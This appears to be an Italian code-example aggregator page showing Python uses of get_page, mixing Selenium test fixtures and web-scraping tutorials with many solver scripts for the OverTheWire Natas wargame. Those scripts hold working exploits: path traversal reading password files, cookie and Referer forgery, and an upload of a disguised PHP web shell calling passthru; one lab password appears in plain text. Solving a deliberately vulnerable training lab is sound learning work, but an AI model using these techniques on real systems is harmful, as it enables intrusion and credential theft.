Esempi in Python per get_page, esempi in Python per base.get_page

Esempio n. 1

0

Mostra file

File: test03_blogs.py Progetto: grimpy/jumpscaleX_threebot

def before():
    global driver
    global rows, blogs
    driver = base.set_browser()
    base.get_page(driver, page_url)
    blogs = base.find_element("blogs_list")
    rows = blogs.find_elements_by_class_name("row")
    assert "Blogs " in driver.title

Esempio n. 2

0

Mostra file

File: link_scraper.py Progetto: Anandh003/web-scraping

def get_random_external_links(home_url):
    if not  home_url:
        return None

    bs = get_page(home_url)

    if not bs:
        return None

    external_links = get_external_links(bs, urlparse(home_url).netloc)

    if not external_links:
        print('No External Links Found!!, Looking around the site for one')
        domain = f"{urlparse(home_url).scheme}://{urlparse(home_url).netloc}"
        internal_link = get_internal_links(bs, domain)
        if not internal_link:
            print('No Internal Links Found!!')
            return None

        external_link = get_random_external_links(
            internal_link[random.randint(0, len(internal_link) - 1)]
        )
        return external_link
    else:
        return external_links[random.randint(0, len(external_links) - 1)]

Esempio n. 3

0

Mostra file

File: natas24.py Progetto: AmmmberQin/natas

def natas24():
    username="******"
    password = "******"
    content = get_page(24, username, password, "?passwd[]=lol")
    password = re.search(r"(?<=Password: )\w{32}", content)
    if password is None:
        print("Fail to find password")
        return
    print(password.group(0))

Esempio n. 4

0

Mostra file

File: natas26.py Progetto: AmmmberQin/natas

def natas26():
    username = "******"
    passowrd = "oGgWAJ7zcGT28vYazGo4rkhOPDhBu34T"

    stdout, stderr = Popen("php natas26.php",
                           shell=True,
                           stdout=PIPE,
                           stderr=PIPE).communicate()
    if stderr:
        print("Fail to find password")
        return
    drawing = stdout.decode("utf-8").replace("\n", "")

    cookies = {"drawing": drawing}
    get_page(26, username, passowrd, cookies=cookies)

    content = get_page(26, username, passowrd, "img/pass.php")
    print(content)

Esempio n. 5

0

Mostra file

File: natas07.py Progetto: AmmmberQin/natas

def natas7():

    username = "******"
    password = "******"
    content = get_page(7, username, password,
                       "/index.php?page=/etc/natas_webpass/natas8")
    password = re.search(r"(?<=<br>\n)\w{32}", content)
    if password is None:
        print("Fail to find password")
        return
    print(password.group(0))

Esempio n. 6

0

Mostra file

File: natas11.py Progetto: AmmmberQin/natas

def natas11():
    username = "******"
    password = "******"
    stdout, stderr = Popen("php natas11.php", shell=True, stdout=PIPE, stderr=PIPE).communicate()
    if stderr:
        print("Fail to find password")
        return
    data = stdout.decode("utf-8")
    cookies = {"data":data}
    content = get_page(11, username, password, cookies=cookies)
    password = re.search(r"(?<=The password for natas12 is )\w{32}", content)
    if password is None:
        print("Fail to find password")
        return
    print(password.group(0))

Esempio n. 7

0

Mostra file

File: natas13.py Progetto: AmmmberQin/natas

def natas13():
    username = "******"
    password = "******"
    _content = b'\xFF\xD8\xFF\xE0<? echo passthru("cat /etc/natas_webpass/natas14"); ?>'
    data = {"MAX_FILE_SIZE":1000, "filename":"evil.php"}
    files = {"uploadedfile":("natas13.php", _content)}
    content = post_page(13, username, password, data=data, files=files)
    upload_path = re.findall(r"(upload/\S{10}.php)", content)
    if not upload_path:
        print("Fail to find password")
        return
    else:
        upload_path = upload_path[0]
    password_content = get_page(13, username, password, "/"+upload_path, byte=True)
    print(password_content[4:].decode())

Esempio n. 8

0

Mostra file

def natas6():
    username = "******"
    password = "******"

    secret_content = get_page(6, username, password, "/includes/secret.inc")
    secret = re.search(r"(?<=secret = \")\w+", secret_content)
    if secret is None:
        print("Fail to find password")
        return
    secret = secret.group(0)
    data = {"secret": secret, "submit": "Submit"}
    content = post_page(6, username, password, data=data)
    password = re.search(r"(?<=The password for natas7 is )\w+", content)
    if password is None:
        print("Fail to find password")
        return
    print(password.group(0))

Esempio n. 9

0

Mostra file

File: navigating_trees.py Progetto: Anandh003/web-scraping

def main():
    bs = get_page('http://www.pythonscraping.com/pages/page3.html')

    # Descendants vs Childerens
    # Children - exactly one tag below parent
    # Descendants - any level below parent
    # All children are descendants but not all descendants are children

    print('------------------Children-------------------')
    # Get Children
    for child in bs.find('table', {'id': 'giftList'}).children:
        print(child)

    print('------------------Next Siblings-------------------')
    # Get Next siblings (this print all rows except header 1st one)
    for sibling in bs.find('table', {'id': 'giftList'}).tr.next_siblings:
        print(sibling)

    print('------------------Previous Siblings-------------------')
    # Get Next siblings (this print none because the selected row is 1st row)
    for sibling in bs.find('table', {'id': 'giftList'}).tr.previous_siblings:
        print(sibling)

    # Dealing with Parents
    print(
        bs.find('img', {
            'src': '../img/gifts/img1.jpg'
        }).parent.previous_sibling.get_text())

    # Regular Expressions and Beautiful Soup
    # Take <img src="../img/gifts/img3.jpeg">
    # Don't try to get this with help of tag or position use look for file path
    images = bs.find_all('img',
                         {'src': re.compile('\.\.\/img\/gifts\/img.*\.jpg')})
    for image in images:
        print(image)

    # Lambda Experession
    # U can pass lambda expression function as argument to findall function
    attributes = bs.find_all(lambda tag: len(tag.attrs) == 2)
    print(20 * '*' + 'Tags with 2 attributest' + 20 * '*' + '\n', attributes)

Esempio n. 10

0

Mostra file

File: wiki_scraper.py Progetto: Anandh003/web-scraping

def get_links(pages, url=''):
    url = f'http://en.wikipedia.org/{url}'
    bs_obj = get_page(url)
    try:
        print(bs_obj.h1.get_text())
        print(
            bs_obj.find('', {
                'id': 'mw-content-text'
            }).find_all('p')[0].get_text())
        print(
            bs_obj.find('', {
                'id': 'ca-edit'
            }).find('span').find('a').attrs['href'])
    except AttributeError as e:
        print('this link is missing something! Continuing')

    for link in bs_obj.find_all('a', href=re.compile('^(/wiki/)')):
        if 'href' in link.attrs and link.attrs['href'] not in pages:
            new_section = link.attrs['href']
            print('-' * 30 + '\n' + new_section)
            pages.add(new_section)
            get_links(pages, new_section)

Esempio n. 11

0

Mostra file

File: natas05.py Progetto: AmmmberQin/natas

# -*- coding: utf-8 -*-
from base import get_page
import re

username = "******"
password = "******"
cookies = {"loggedin": "1"}
content = get_page(5, username, password, cookies=cookies)
password = re.search(r"(?<=natas6 is )\w+", content)
if password is not None:
    print(password.group(0))
else:
    print("Fail to find password")

Esempio n. 12

0

Mostra file

File: test02_alerta.py Progetto: grimpy/jumpscaleX_threebot

def before():
    global driver
    driver = base.set_browser()
    base.get_page(driver, page_url)
    assert "Alerta" in driver.title

Esempio n. 13

0

Mostra file

# -*- coding: utf-8 -*-
from base import get_page
import re

username = "******"
password = "******"
content = get_page(2, username, password, "/files/users.txt")
password = re.search(r"(?<=natas3:)\w+", content)
if password is not None:
    print(password.group(0))
else:
    print("Fail to find password")

Esempio n. 14

0

Mostra file

# -*- coding: utf-8 -*-
from base import get_page
import re

username = "******"
password = "******"
content = get_page(3, username, password, "/s3cr3t/users.txt")
password = re.search(r"(?<=natas4:)\w+", content)
if password is not None:
    print(password.group(0))
else:
    print("Fail to find password")

Esempio n. 15

0

Mostra file

File: natas04.py Progetto: AmmmberQin/natas

# -*- coding: utf-8 -*-
from base import get_page
import re

username = "******"
password = "******"
headers = {"Referer": "http://natas5.natas.labs.overthewire.org/"}
content = get_page(4, username, password, headers=headers)
password = re.search(r"(?<=natas5 is )\w+", content)
if password is not None:
    print(password.group(0))
else:
    print("Fail to find password")

Esempio n. 16

0

Mostra file

# -*- coding: utf-8 -*-
from base import get_page
import re

username = "******"
password = "******"
content = get_page(1, username, password)
password = re.search(r"(?<=The password for natas2 is )\w+", content)
if password is not None:
    print(password.group(0))
else:
    print("Fail to find password")

Esempio n. 17

0

Mostra file

File: advanced_html_parsing.py Progetto: Anandh003/web-scraping

# CHAPTER 2 - Advanced HTML Parsing
from base import get_page

bs = get_page('http://www.pythonscraping.com/pages/warandpeace.html')

#findall(tag, attribute, recursive, text, limit, keywords)
names = bs.findAll('span', {'class': 'green'})

names = {name.get_text() for name in names}

for name in names:
    print(name)
"""
Other BS Objects
    Bs object   - Instance of BeautifulSoup
    Tag object  - Retrived in list or by calling find and findall functions
    navigableString object    - Used to represent string rather than tag
    comment object  -   used to find HTML comments
"""

Esempio n. 18

0

Mostra file

File: test01_myjobs.py Progetto: grimpy/jumpscaleX_threebot

def before():
    global driver
    driver = base.set_browser()
    base.get_page(driver, page_url)
    assert "Myjobs Visualizer" in driver.title